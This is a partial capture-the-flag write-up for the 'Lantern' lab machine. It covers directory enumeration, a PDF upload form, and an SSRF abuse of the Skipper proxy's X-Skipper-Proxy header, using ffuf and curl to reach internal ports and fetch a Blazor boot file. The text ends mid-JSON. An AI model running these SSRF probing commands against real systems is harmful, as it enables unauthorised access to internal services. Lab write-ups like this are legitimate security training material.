Lantern

Recon

nmap_scan.log|h-50%_styled
└─$ grep lant /etc/hosts
10.129.65.97    lantern.htb

HTTP (80) [Enum]

Simple website serving some html. Vacancies page seems interesting. Upon uploading a file that ends with .pdf we get Thank you! We will conact you very soon!

Writeup.png

No subdomains or interesting files found on port 80.

└─$ feroxbuster -u http://lantern.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
by Ben "epi" Risher 🤓                 ver: 2.10.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://lantern.htb/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        5l       31w      207c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      238l      676w    10713c http://lantern.htb/vacancies
200      GET       81l      384w    31614c http://lantern.htb/static/images/avatar-1.jpg
200      GET       85l      485w    41045c http://lantern.htb/static/images/avatar-2.jpg
200      GET      126l      692w    55960c http://lantern.htb/static/images/blog-3.jpg
200      GET      155l     1017w    81167c http://lantern.htb/static/images/blog-1.jpg
200      GET      484l     2406w   189281c http://lantern.htb/static/images/about-2.jpg
200      GET      146l      918w    76869c http://lantern.htb/static/images/blog-2.jpg
200      GET      150l      735w    60143c http://lantern.htb/static/images/about.jpg
200      GET      191l     1227w   106995c http://lantern.htb/static/images/about-1.jpg
200      GET       93l      615w    59733c http://lantern.htb/static/images/avatar.jpg
200      GET    11810l    23508w   243203c http://lantern.htb/static/css/style.css
200      GET      225l      836w    12049c http://lantern.htb/
405      GET        5l       20w      153c http://lantern.htb/submit
200      GET       60l      128w     1650c http://lantern.htb/static/js/main.js
[####################] - 4m     30021/30021   0s      found:14      errors:3
[####################] - 4m     30000/30000   142/s   http://lantern.htb/

The file upload only accepted PDF, I tried uploading malicious payloads but no callback and XSS too didn't work. malicious-pdf

HTTP (3000) [Enum]

Some kind of Admin panel which seems to be using Blazor

Writeup-1.png

Hmmm..

Writeup-2.png

Communication happens on Websockets?

Writeup-3.png

Feroxbuster with common.txt wordlist found /error

Writeup-4.png

In the response headers we get Server: Kestrel too.

HTTP (80)

Skipper Proxy

Port 80 also runs on blazor and the response headers has Server: Skipper Proxy

    <script src="_framework/blazor.webassembly.js"></script>

Skipper vulnerable to SSRF via X-Skipper-Proxy

└─$ ffuf -u 'http://lantern.htb/' -w ports -H 'X-Skipper-Proxy: http://127.0.0.1:FUZZ'
       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://lantern.htb/
 :: Wordlist         : FUZZ: /home/woyag/Desktop/Rooms/Lantern/ports
 :: Header           : X-Skipper-Proxy: http://127.0.0.1:FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

22                      [Status: 500, Size: 22, Words: 3, Lines: 2, Duration: 102ms]
80                      [Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 85ms]
3000                    [Status: 200, Size: 2847, Words: 334, Lines: 58, Duration: 191ms]
5000                    [Status: 200, Size: 1669, Words: 389, Lines: 50, Duration: 77ms]
8000                    [Status: 200, Size: 12049, Words: 4549, Lines: 225, Duration: 78ms]
:: Progress: [24032/65000] :: Job [1/1] :: 552 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
[WARN] Caught keyboard interrupt (Ctrl-C)

Looks like SSRF is valid.

While searching around for blazor common files I came across the chanan/BlazorStyled/docs/_framework which had interesting files, like jsons. The files were not readable unless we used the X-Skipper-Proxy header:

└─$ curl http://lantern.htb/_framework/blazor.boot.json
<!doctype html>
<html lang=en>
<title>404 Not Found</title>
<h1>Not Found</h1>
<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
└─$ curl http://lantern.htb/_framework/blazor.boot.json -H 'X-Skipper-Proxy: http://127.0.0.1:5000'
{
  "cacheBootResources": true,
  "config": [ ],
  "debugBuild": true,
  "entryAssembly": "InternaLantern",
  "icuDataMode": 0,
  "linkerEnabled": false,
  "resources": {
    "assembly": {
      "Microsoft.AspNetCore.Authorization.dll": "sha256-hGbT4jDhpi63093bjGt+4XVJ3Z9t1FVbmgNmYYmpiNY=",
      "Microsoft.AspNetCore.Components.dll": "sha256-NJ2GmZOAzlolS7ZPvt5guh86ICBupqwCNK0ygg7fkhE=",
      "Microsoft.AspNetCore.Components.Forms.dll": "sha256-YEcUfJbV\/+SrxppUEKn5jqOg8WptBrdAGaDG+psN8Yg=",
      "Microsoft.AspNetCore.Components.Web.dll": "sha256-aq+IFhf0HZZKVz6P\/GhuaY0UvXsguM0h5hlYrzAfugk=",
      "Microsoft.AspNetCore.Components.WebAssembly.dll": "sha256-zARafz0vNUQ9qVFCoQO3oQSP+VMitM2+PZs+2OkxMgE=",
      "Microsoft.AspNetCore.Metadata.dll": "sha256-hXAd66KKDdPFPpv7aqk5iax9UhTcBUufrs8eHMuWft8=",
      "Microsoft.Data.Sqlite.dll": "sha256-P7LhObgh2GnsYLLiMfziXrBpg9kGBWyCbsYGkwtejF8=",
      "Microsoft.EntityFrameworkCore.dll": "sha256-\/0vzNZ5eWblA2X+fR1UnJhUxV8M4YE+hmYHhDjTGLRo=",
      "Microsoft.EntityFrameworkCore.Abstractions.dll": "sha256-8WueLfL+Qxf6IHdLNiHRte4+9uKx0fzs0SwZLo+vyE0=",
      "Microsoft.EntityFrameworkCore.Relational.dll": "sha256-mZQU3N+UuoJQXtwxG9xddHMJcWK3bjbR8vYUtaD+qhw=",
      "Microsoft.EntityFrameworkCore.Sqlite.dll": "sha256-3OAZnYHlX6IWO0525\/6Hb9dldwpLRrDYpJyOgrOfM3g=",
      "Microsoft.Extensions.Caching.Abstractions.dll": "sha256-WLcZIKlgct2nj4hpaBvZXfHorQG9DH9B\/FZ2IKePG2I=",
      "Microsoft.Extensions.Caching.Memory.dll": "sha256-+\/xwpO8U5NMbRcqzMIKrIuvK9dnm3EX9S2C6diMDLmQ=",
      "Microsoft.Extensions.Configuration.dll": "sha256-c8yYhfrOBLEnOBglLTu9peXSbJDwFpuT4UQiXSv28Og=",
      "Microsoft.Extensions.Configuration.Abstractions.dll": "sha256-5Otet+KKVUjNkE\/hqcNWmt75H1K2VNuKPFagpRd6Ces=",
      "Microsoft.Extensions.Configuration.Binder.dll": "sha256-wNKhG3Ovx8jqxbscz2AALlsTLfI6GL2dyDhe63mSsoM=",
      "Microsoft.Extensions.Configuration.FileExtensions.dll": "sha256-n2fRP2\/1tGNzaCF5PU4hgTSlHK886OviBf2YAds3NdE=",
      "Microsoft.Extensions.Configuration.Json.dll": "sha256-R28\/ywLWxIcFxKtDIj0IxC+bXi4urX6BHeLL24R+vTQ=",
      "Microsoft.Extensions.DependencyInjection.dll": "sha256-KqgYK1NWqMxcNfw2Qah+gUhX2Nm+OZrHjyYDQ3VNCeA=",
      "Microsoft.Extensions.DependencyInjection.Abstractions.dll": "sha256-nM2DA1GqKLxoPU+NHO\/Z5yQWH5ctJb+2Tu5b9VxIxeM=",
      "Microsoft.Extensions.DependencyModel.dll": "sha256-tkBiVGV6aPhN9weYepMZ2vvS6Ggf0uOE88fuWINRAHg=",
      "Microsoft.Extensions.FileProviders.Abstractions.dll": "sha256-7PzvEcQvpK1c8tTX9VPI8AF+XrekqbAytNBQXJjvTvQ=",
      "Microsoft.Extensions.FileProviders.Physical.dll": "sha256-sXujvGMZDgBBZ9HqfcEq9XsM0pvwyhPt60NA9qLDzGI=",
      "Microsoft.Extensions.FileSystemGlobbing.dll": "sha256-viiXOG0fwhWobT0TQ1ZOJiZBdRvYRlWbDtjz+6d8sQI=",
      "Microsoft.Extensions.Logging.dll": "sha256-GDZQCBtVHfrZZ6fL95lGoinLeUWLjQShLbfESwO7mrc=",
      "Microsoft.Extensions.Logging.Abstractions.dll": "sha256-1XXJ0VQ8pybOFNvf\/RA+k+pSfNRrsoMW2h9BItvFXVY=",
      "Microsoft.Extensions.Options.dll": "sha256-eGESyy9mRu8RcCGajAu4E8nxSmeB5nxiZkFPVaZ5Vl0=",
      "Microsoft.Extensions.Primitives.dll": "sha256-jOmoWSfsdQexH\/6QCA56gR1RMEqeix2iDDUBWbpAOQI=",
      "Microsoft.JSInterop.dll": "sha256-U4TlhQzx2DEFb2LgmELxAvWalkXk5Dx\/HsVDyQH8ubA=",
      "Microsoft.JSInterop.WebAssembly.dll": "sha256-11MM537VpREUoEMIiXr2jsO5eqHCkixj9Zi1I4hLPOw=",
      "Radzen.Blazor.dll": "sha256-O3yDs1MlWqWu2hreREiTQAVCo6UPcAhx\/1zwHAbq9AU=",
      "SQLitePCLRaw.batteries_v2.dll": "sha256-3zKmFZbXOvqy\/nbxPUg5JZvDTOvq9arYLUdbvEcjJaU=",
      "SQLitePCLRaw.core.dll": "sha256-PNJw8RYgf8D34p1OhHDWQniuocI62TExP3HpyqrrhCc=",
      "SQLitePCLRaw.provider.e_sqlite3.dll": "sha256-HbBW2\/rK7rujCfVp110bCv\/xKe+LGGRcIbcF73Mq7uM=",
      "System.IO.Pipelines.dll": "sha256-fpnawcAWgJ8i0JPJ9DhQ8XFDKYsTi6md2eRFNh\/bONA=",
      "System.Linq.Dynamic.Core.dll": "sha256-FdGinC2F9gJYE7tbVl93B0jYWTB+CCpGiFHbABqlHFE=",
      "Microsoft.CSharp.dll": "sha256-ql0JuqQqMvWlkrz+ktRnb+sgR+RBuabSpT82YicO+Dc=",
      "Microsoft.VisualBasic.Core.dll": "sha256-yjDGnYBu6yp61MAe+i7sbIj\/AgPhLbBm5dleSxMPjDo=",
      "Microsoft.VisualBasic.dll": "sha256-m6TH5rs0haOMSWvUpe3f7naMYyalexbVkIbVq1amiUw=",
      "Microsoft.Win32.Primitives.dll": "sha256-876FS9JtlcgkjOdpbs3USC8yRAhx1J17Oe06Sxvgv1s=",
      "Microsoft.Win32.Registry.dll": "sha256-XobufPKAyEWhlHb3h0C1DBkY0W+tuI2nHHzJSlv6sd4=",
      "System.AppContext.dll": "sha256-hBsiGfTO8GaNHCdJ56FXzm0RGbXphFD5i7XcgumQ5eE=",
      "System.Buffers.dll": "sha256-cIBVQrX2W2b5N8+mTMqkZWml\/dk2IYx7pMUf0\/Ht5W4=",
      "System.Collections.Concurrent.dll": "sha256-siI159VpD2kJEZKPQt190M1ILHAQ8zZmlExN8ABLOpw=",
      "System.Collections.Immutable.dll": "sha256-RnZJ2YASocT2oB\/iuNE8vQvy6NfhULpfdVIbtKIHCDI=",
      "System.Collections.NonGeneric.dll": "sha256-dK0uprIk58Zq\/0ds9ff4NdXE+eGgwXEPt1+zHdwEDEQ=",
      "System.Collections.Specialized.dll": "sha256-PpNg+QA9B70KCxPBqJYreFMpDplPOZEczvjo\/G+vdU4=",
      "System.Collections.dll": "sha256-7+zDvydzBWfAOV3bOqXSCD7GqskEAIQ3RzZ0IXiQsAs=",
      "System.ComponentModel.Annotations.dll": "sha256-gJZuo7oH44JEm+ABiI\/0SCYvW4btsifc6SQ93rolPtQ=",
      "System.ComponentModel.DataAnnotations.dll": "sha256-c9XX2VfWJO2vQwja\/S9IMq4IaEVNIFBSdo1yN00ipTM=",
      "System.ComponentModel.EventBasedAsync.dll": "sha256-a6Zv5CE2XCHSH6P5one9x+s9AETxFBsps9r9xjbyytk=",
      "System.ComponentModel.Primitives.dll": "sha256-Ldn4aoxvjOLgvQ9Onwicuzrx2fFIu3Rz0Dv2MdNsLtw=",
      "System.ComponentModel.TypeConverter.dll": "sha256-Z22usUOyo6Y+llp9jVHm8X+MiU41IkuvJTkuJMNOmx4=",
      "System.ComponentModel.dll": "sha256-4mdLIiD68reMpts\/jwSZNSDriaxeKwnQN\/bbRp3ymjc=",
      "System.Configuration.dll": "sha256-ndWVZOsXDGoCB+GrsvduXcLDyAcFi+H7G\/MeMcGAmkQ=",
      "System.Console.dll": "sha256-sfSjogW2UHhB1\/Nh5SNyZLbc\/Qx1Sd\/t59EZEIiAGsE=",
      "System.Core.dll": "sha256-UIvt8dePz7PcAULl7yQlO0Re3Q\/06HNI8nxsH1MNLFk=",
      "System.Data.Common.dll": "sha256-QHHyRzOPsWFYvrU4Z2hnJmZmzhgirRscl7n7L3BiTfE=",
      "System.Data.DataSetExtensions.dll": "sha256-jBgz7GiFLxY3uae0rmhsnCrhFw3nWh37zS8xK6XXCLw=",
      "System.Data.dll": "sha256-uprvV1ostYH0WGtP0peiUMFKZgWyj1F3RsCA0+Pjwno=",
      "System.Diagnostics.Contracts.dll": "sha256-04HscpY2KVy3rAYunUTynLbO1QdOrQEy2IWRaxtUD1E=",
      "System.Diagnostics.Debug.dll": "sha256-dJ0BRGYTZEKX2lvaiF3DwOs+3NoksKxBc\/\/JkhS3el4=",
      "System.Diagnostics.DiagnosticSource.dll": "sha256-6Bda\/qXnVWWS\/+W6zwzK5ahNXI+IXHSat2Y482ykUXY=",
      "System.Diagnostics.FileVersionInfo.dll": "sha256-VgF91zwEvvHl9WyGF\/9\/EcW5f5hoV4nXji82rrTgODs=",
      "System.Diagnostics.Process.dll": "sha256-LAcV0KCZ+lbQJx5wxbOfg+XHNwtiv0KjE5b2NlXxj4A=",
      "System.Diagnostics.StackTrace.dll": "sha256-4aulZf3KsEhHbaCOEWI1MzSQKYXwVCXgXbuKWPARBMI=",
      "System.Diagnostics.TextWriterTraceListener.dll": "sha256-hOv0U7h8qObsuPJEx\/m8mLcv99r5\/MdONagOQMG3h3g=",
      "System.Diagnostics.Tools.dll": "sha256-yFuBkKVLF5YkUzXiUJdN9Aax1ip9qdKa4g4vHSM7Pg4=",
      "System.Diagnostics.TraceSource.dll": "sha256-zSVMA9jpwFQ+HUCn5AgptC59Rqy2QluMrw5iq1Awr+o=",
      "System.Diagnostics.Tracing.dll": "sha256-Znt2F2MvUczDKdqHSlxjNU1l9XUqzA+olkHYI\/\/HEZc=",
      "System.Drawing.Primitives.dll": "sha256-u6Ds7SMMOdGgX52t00SUjNCXTD1imy8s7QBj2qlIam8=",
      "System.Drawing.dll": "sha256-HgN64SBiB8Ajrh25n\/DjpxcW6qQuzrtxZ4Om+nR2dd4=",
      "System.Dynamic.Runtime.dll": "sha256-E+Uyxsihob6Ysg2e6tonQQQzKQKAr0M2AINEgeY72Uc=",
      "System.Formats.Asn1.dll": "sha256-ttncKNMxBNIMM26nmx0L1TTCxr\/r0rEIldSh7vWwHYw=",
      "System.Globalization.Calendars.dll": "sha256-GPVcdDqvBvLxmW0dy4KAChwohexPWXuuSKljnSJyYEI=",
      "System.Globalization.Extensions.dll": "sha256-bv7qPH+2WGAyoWOFFn31s26eTEvdwWF9B3JY7Ooueqs=",
      "System.Globalization.dll": "sha256-+WfptQvKMZV5hzhEIAfPGh4++aNn+SBTCs\/iI1WR8Dk=",
      "System.IO.Compression.Brotli.dll": "sha256-bGxNHKkn7llJau+sGbQ2G3ASBqnpv337+kRmN63ftLI=",
      "System.IO.Compression.FileSystem.dll": "sha256-ahuONSqKzbUeueVBOowVQ6tHUijcV3h4LII\/dCWTY+w=",
      "System.IO.Compression.ZipFile.dll": "sha256-dRbKoalR17SAvWAkQj7jLreA6QRJ1LIuXd2au5Xekzw=",
      "System.IO.Compression.dll": "sha256-wG4o2\/MIZgfUDo1Vet1Gip0SORGlHfGp2Yp6Dxo6Vt0=",
      "System.IO.FileSystem.AccessControl.dll": "sha256-eYdrk8dJz\/wUrufjP\/UNggdTFNwk4O3YwbpHTdUDsX8=",
      "System.IO.FileSystem.DriveInfo.dll": "sha256-VsDACniP8x714h33W\/zlQSqoMDUEuI2PhdjL0e2iCOc=",
      "System.IO.FileSystem.Primitives.dll": "sha256-YR5Y9FjJgCSd2ICb5R+kQ1OULbHknX\/rT5DcuBfEKN0=",
      "System.IO.FileSystem.Watcher.dll": "sha256-DofMA10KA6kXgqHGF0T+tkZs23dvaX8tOubRco6EE0c=",
      "System.IO.FileSystem.dll": "sha256-AQmejCKaDpWSbijkXOHGKGPx7omcSePn0xhYEa+9\/nU=",
      "System.IO.IsolatedStorage.dll": "sha256-KI5UJjVeANP6d5Ya0iiG5ezOqCZDyL5FngTHdOu08SA=",
      "System.IO.MemoryMappedFiles.dll": "sha256-bdImZQ\/CjWze5n5Q0qW+HdYxUfg0shaUKvIGaS7M4ts=",
      "System.IO.Pipes.AccessControl.dll": "sha256-UPKPCzZwwaiE6bk32YvgCJjF5d3d8ORAGBzFYOAebsY=",
      "System.IO.Pipes.dll": "sha256-s4RGtH\/jENkZfbXgVQRYW2M6c+x+lKPS2NQV\/I8F5Vo=",
      "System.IO.UnmanagedMemoryStream.dll": "sha256-d9XMexSCGwm51FC26V1ruNMrkcaWMnaRlHZ0RlWpgk4=",
      "System.IO.dll": "sha256-tPl5IEqEL9rZ0AA1lNyWr+NpSAsJXq18FGJ+yT59Axw=",
      "System.Linq.Expressions.dll": "sha256-JHWBpvo7vIZoyC6nJKrsySWYISCX4rcC1vrooBjOeiw=",
      "System.Linq.Parallel.dll": "sha256-pNJ8lVItDNo+fLK\/fk18QB4pRLmqbT0Ynrq3O563b3E=",
      "System.Linq.Queryable.dll": "sha256-g1mOwcDyw7rBZgQx5SY0lsX8ZzXxDwTdOD3lbZjXx9g=",
      "System.Linq.dll": "sha256-kKiuT3My5hXJTds+8wSpfhnkQ3EuNwAQOxLGXVWoo\/M=",
      "System.Memory.dll": "sha256-WkC8Wsmx3jhJzOozIVey19+2WCRKagDXqQ2wPoTmqMQ=",
      "System.Net.Http.Json.dll": "sha256-yxJsoo7mpPgba40f9MtcAVBP51xO6MdTAXUl6snT4h4=",
      "System.Net.Http.dll": "sha256-r3K4KxolDW28DS3TVL\/TGXhligLQC6Z3HjHkmDmIfas=",
      "System.Net.HttpListener.dll": "sha256-v4pad4WjG60vdOD6uLny6O81hhrBVd48y9rDdN8Dq\/o=",
      "System.Net.Mail.dll": "sha256-2mwF5+qoPkx3XIiJi2OYUzem+cWt3VF9+KaNf8Hsye0=",
      "System.Net.NameResolution.dll": "sha256-M1ZJefldkQZKromnEt+NOuyj\/yZoRNZA4ylC65eHm6g=",
      "System.Net.NetworkInformation.dll": "sha256-wsMHsDbz4d5DydbVLVrBTCbD\/9iiZ7nnySLsoe9lZOA=",
      "System.Net.Ping.dll": "sha256-OgyabYmjg\/QoikHVhC21oZ+j+l1qh8KY4q3r\/M2NnTI=",
      "System.Net.Primitives.dll": "sha256-NG4UfhaU5YjgXEGUyUp4iQz9iZVaq4bDWEKYS25AYag=",
      "System.Net.Quic.dll": "sha256-EBUis8AXuMo+\/ClBGBEBRQSBsN2VZVCUW2lK8KgqHDc=",
      "System.Net.Requests.dll": "sha256-D28ojQn2wULGH3UY3KCQq\/W2tQOTXdEjf4o5QzrxjpA=",
      "System.Net.Security.dll": "sha256-rtOi8JvsuVI2UHUu3K2aTXHfW\/HaUT8hfWmOCHqJfD8=",
      "System.Net.ServicePoint.dll": "sha256-xC8LyLf2wKJv9NbYGxIBF0U278DK+R9EC+TiVQB3kEw=",
      "System.Net.Sockets.dll": "sha256-KnJrJeKN7C63waH5UwAkTrInYNHGZn9QuVFCbLg4wMk=",
      "System.Net.WebClient.dll": "sha256-ujyYKldEAwk4tEavtIDnDLqiqbzF2QjVmAzqx8MsQng=",
      "System.Net.WebHeaderCollection.dll": "sha256-vnRspNkJub8sXtoWeZs8+oq+1FsquxH756RKGxjOku8=",
      "System.Net.WebProxy.dll": "sha256-bIe3ECnqNiPcRaLQowGHm3WTfeCrHrs9HmTmHrrl9vI=",
      "System.Net.WebSockets.Client.dll": "sha256-xkeIwJxbwgJVlEbFDEygTnyJy+fX4zml2\/9\/MSkf8gE=",
      "System.Net.WebSockets.dll": "sha256-j7qKM1czN5Vc8ZqXLXPbxo4ddYPM6dXSUTShZb1rtkI=",
      "System.Net.dll": "sha256-G8nfef3F7xib4OgZq9SblT3qQIliMyySyx4evJzSqEE=",
      "System.Numerics.Vectors.dll": "sha256-hbOCd5D16UtHUaw9nqW8e+4GschlwoU4GEyTgTYt\/Jo=",
      "System.Numerics.dll": "sha256-C9vZH9HxWKaSHK6pme42QeTgu37MzEGBSlHeQtzixEA=",
      "System.ObjectModel.dll": "sha256-pm3\/qRJNMeOtJciRC71QcNZz+0T3D97YnGyOnasBho4=",
      "System.Private.DataContractSerialization.dll": "sha256-QbUE5Dd94wLrv6MhfNewyz+lNv7VIFWVofS7ohYdrXU=",
      "System.Private.Runtime.InteropServices.JavaScript.dll": "sha256-\/8PF7xlkMgqCzSnp4roSH8ICGHPrzz4\/1C0DIichYpI=",
      "System.Private.Uri.dll": "sha256-X62lyZatIoKTJY\/Rt31LgU\/\/NX88W86O6pfWh6XS41c=",
      "System.Private.Xml.Linq.dll": "sha256-UqktLl8RdHKrJ38qqF6XlvPOvi3xgY6ZVEeuOa4u6w8=",
      "System.Private.Xml.dll": "sha256-feqoL93GgPoHmad5UF2r0yg4RTbJhYsXQcimiawJv6U=",
      "System.Reflection.DispatchProxy.dll": "sha256-zlWNpwEJQEcx7Mf1xOg\/Sd5hIn1YGK+LBeiAhjKYabs=",
      "System.Reflection.Emit.ILGeneration.dll": "sha256-Wwzmn9ixLOdT9Q4S3lsGbvU6RgX88PrdJapC2weJQ50=",
      "System.Reflection.Emit.Lightweight.dll": "sha256-StIky\/cqvRUJnMZgDJ3S8zDgKeyiOXPBGul1qmY3zQo=",
      "System.Reflection.Emit.dll": "sha256-8+wJTovqZaO43nyKvBpajlYed1fklPXupH24vEe1rcE=",
      "System.Reflection.Extensions.dll": "sha256-14fnFJC0FAATTHPiVrQwvmLmm2qi8Ni18HvYZNZX0rs=",
      "System.Reflection.Metadata.dll": "sha256-ighwuSyDVJI1oYrAoHA3PMc5uEh3LRZQ1D1+nJnzXF4=",
      "System.Reflection.Primitives.dll": "sha256-YQBeKPHUbX9vi3HtoUXyks9WPlb2pyV8rtrQK\/6ycCU=",
      "System.Reflection.TypeExtensions.dll": "sha256-qvnV8ZTIWtntKKNR7pZ+KwpfPO1EpWD4yh8jTkYKYRo=",
      "System.Reflection.dll": "sha256-u7GYvozPApwvzjBc31GuZMeH6vtzPd9PToVE73OANPg=",
      "System.Resources.Reader.dll": "sha256-c6FJmtQRb\/VHa2HJ26jk10tgkc4EPI2zAzh3K5asxbU=",
      "System.Resources.ResourceManager.dll": "sha256-f4HxrKxMgkTr4MzgdDVq1xRj0nMZ4DX85ZclMulX4vQ=",
      "System.Resources.Writer.dll": "sha256-dTHiLV8bUkk1UG8EMyt6DGqR0l2qPUOC9q6q0cyznYY=",
      "System.Runtime.CompilerServices.Unsafe.dll": "sha256-k3HWAm8hCD5yrBJ0UPew1ORMmeGyy74ZErf6+X9ETJc=",
      "System.Runtime.CompilerServices.VisualC.dll": "sha256-WXOm0n0aBJE1\/2QHYsnQLD0su942NQ7odPc+YNxdab0=",
      "System.Runtime.Extensions.dll": "sha256-rzt5RwKG9PduPh47i6I1uq43MXbSEQQ5qC4IanNwgg8=",
      "System.Runtime.Handles.dll": "sha256-wJflcv43fAzX3kczlUUcZaLqy6xebfNpO7YWrUdlN6M=",
      "System.Runtime.InteropServices.RuntimeInformation.dll": "sha256-TXdeaQuMYwYsZekQZ94n3P\/4WBM9geAoxMU1GMUOFh8=",
      "System.Runtime.InteropServices.dll": "sha256-FhSvdPrUwd2cSpIG5LueEynIbkhqsDJfuhUkjTqV7HI=",
      "System.Runtime.Intrinsics.dll": "sha256-SbogkH6qeJsWsV7iPIlfWmG+OtFRsWr6PGmtmYel3ss=",
      "System.Runtime.Loader.dll": "sha256-04rg75EwwT+qlxSxKNgA\/it8MbVGDr0Xmo30v\/XtW4Q=",
      "System.Runtime.Numerics.dll": "sha256-9Lyq9ORGeQFNnJWFUIMzcCVONRm33mMZbcHQ+7kYkqw=",
      "System.Runtime.Serialization.Formatters.dll": "sha256-g4\/A5rwaNm8ntiwoA5n2bhpO1XoMBRWDba1wquClO8I=",
      "System.Runtime.Serialization.Json.dll": "sha256-WAS9zuFqSGp55zoZVEWUVl+JRk5RN6wVKXkSziM3OOw=",
      "System.Runtime.Serialization.Primitives.dll": "sha256-DdvnEF4CSXMqkj0quXgPLlWeBhOEwIK8tEM3Nj132aM=",
      "System.Runtime.Serialization.Xml.dll": "sha256-CAGIKrs6UDzetxsW5agYluy6Ku1Ea0UFOeNkswJtqh8=",
      "System.Runtime.Serialization.dll": "sha256-OLkN7ThXD3qZPadaVb\/V+Sd6HsIbYXDIEKJVCfOZ5V4=",
      "System.Runtime.dll": "sha256-u+p1S6CWZDwJPi5yNoSZRRiispI7HwTKRxrdHErPkE8=",
      "System.Security.AccessControl.dll": "sha256-2KdkUTv\/4QPdccH96o1athaPwNRlEFqAG1D1zC55Ywg=",
      "System.Security.Claims.dll": "sha256-kgo+HeoL9k2ntqYDslCFA5WhBDMEjo3RKAs04ig\/2iE=",
      "System.Security.Cryptography.Algorithms.dll": "sha256-A3pi8LOTmfQIFFXXJc\/V2uOa2EvA2IOpwGDwwf8Xu9A=",
      "System.Security.Cryptography.Cng.dll": "sha256-BTtw7nptKY75SZqEGpzteOkSJ1riOa+ynW4t8iELp1c=",
      "System.Security.Cryptography.Csp.dll": "sha256-jgxjePXbj7T\/imxqEuM7yxndarlPmO1Mhzx1KSsbE\/o=",
      "System.Security.Cryptography.Encoding.dll": "sha256-Yu9rAfznTa+e51IdWkbpGniy\/7zr\/81SlaKE6xeAbAE=",
      "System.Security.Cryptography.OpenSsl.dll": "sha256-doNcZf7tQQexD78KDZYAbF3BIpj0zDkvBiKeSInZ\/PI=",
      "System.Security.Cryptography.Primitives.dll": "sha256-KuFuBLIlVhgZc9rkRbtJ4byWpfROhUNUjB6nBYab7DY=",
      "System.Security.Cryptography.X509Certificates.dll": "sha256-4OwV7OWq8+y1raWVDGXWTHGjq\/Q6LFqFMn5MoMqNCW4=",
      "System.Security.Principal.Windows.dll": "sha256-QR3r1ek64aGNBXWL5DLmj0t3NBMBskYDhwGDCrLQ\/o0=",
      "System.Security.Principal.dll": "sha256-AvspaIoT5XoryB02FU3R2VE+BbTUzIjY1TQtk+Igx1o=",
      "System.Security.SecureString.dll": "sha256-dPPmyPEcJ6\/7BDnE22U04KLqZz9ylEGz3YcVGBoeAhU=",
      "System.Security.dll": "sha256-lVo1IzpQ8ApPfXku3TfD+\/WMupxwhj27kxNklLs00uM=",
      "System.ServiceModel.Web.dll": "sha256-u6BruHSOCTTwM3mYmrZrI4ZapE+BXNjEhCEhZzncb8Q=",
      "System.ServiceProcess.dll": "sha256-q9qiSJlSYsOOAiGL2eoKMB6tmGWJ0jiiiV03QkJj+9Y=",
      "System.Text.Encoding.CodePages.dll": "sha256-h4c5zE7USMsMhnXdicO+QFRHhrSH00yG+o4hRoqmqsI=",
      "System.Text.Encoding.Extensions.dll": "sha256-VKQUSIrhN95oGK0ZNOPersGZUsrV8OkM5B\/izDGHaeI=",
      "System.Text.Encoding.dll": "sha256-cvkUmV\/SjtZC2SSfM3Z+P0+gbORa\/QUTnqYefItcMGo=",
      "System.Text.Encodings.Web.dll": "sha256-eWzqi7I99oo4C6cURzIg\/VRsDO8GfDDg9BU7xHWhshI=",
      "System.Text.Json.dll": "sha256-PNCDoNNxxyyeGxORbdIYh0kYj7UA+nLzlH+TzAjJtGU=",
      "System.Text.RegularExpressions.dll": "sha256-qoZcnZH56UJS6ZNiULVv45neh+C5fylKYXWVVCBoVZI=",
      "System.Threading.Channels.dll": "sha256-iVA9v1W3Kh8tsRVShEC5puyrQ5z8K8Jd9NG13NNGNcg=",
      "System.Threading.Overlapped.dll": "sha256-4f7W3R6ayi71vj8Dx0V+b6LKWyBbWgXzIvYoVx6sB\/E=",
      "System.Threading.Tasks.Dataflow.dll": "sha256-brkgW8gANJqDXLXZdLO\/4lBjsSI1ePj34x1ns3cfrew=",
      "System.Threading.Tasks.Extensions.dll": "sha256-PENIL2r6939Zb5O7Fbd79vTqPJGtG7e4rZNo8t8GOpA=",
      "System.Threading.Tasks.Parallel.dll": "sha256-O2W\/J4L8RL3MogHSrgHco2ZB00Q44wpJi59+l+RenbA=",
      "System.Threading.Tasks.dll": "sha256-4DG5EctwgYdGf2XhwKU1V\/kDFo1zDwHRt+\/\/MlbxJIk=",
      "System.Threading.Thread.dll": "sha256-Eu265Abl4uYVdiEC1SiBUm1CCZ7C+t\/wHqnKgtenUJc=",
      "System.Threading.ThreadPool.dll": "sha256-eR1VbM1uBfWEvwE9103JLehTShaojDIfOzAEL3BRtek=",
      "System.Threading.Timer.dll": "sha256-ohxHNOfivKoEfv6hFt3hRJrUrM7eRLPdX16pZ3sl40w=",
      "System.Threading.dll": "sha256-PJukAfA8ombxR1eZIWeENQmv9cTirn98W+tMp9JcJN8=",
      "System.Transactions.Local.dll": "sha256-kynD5I7qlEINTpHQAx9OCNHgDSG2MiaP7eKr5nE2ux0=",
      "System.Transactions.dll": "sha256-8D1kOFTvSoOImIhguPn7hcE9jDscPMoiXNDmMkLIhZQ=",
      "System.ValueTuple.dll": "sha256-oNAUfyqU\/GxYAN27YzGmESuB04CIUSWi\/d0X1whLjbE=",
      "System.Web.HttpUtility.dll": "sha256-5J7arVRsJc4JnZXrXNijEu9GyuzstA7oWh5N+BcUgmE=",
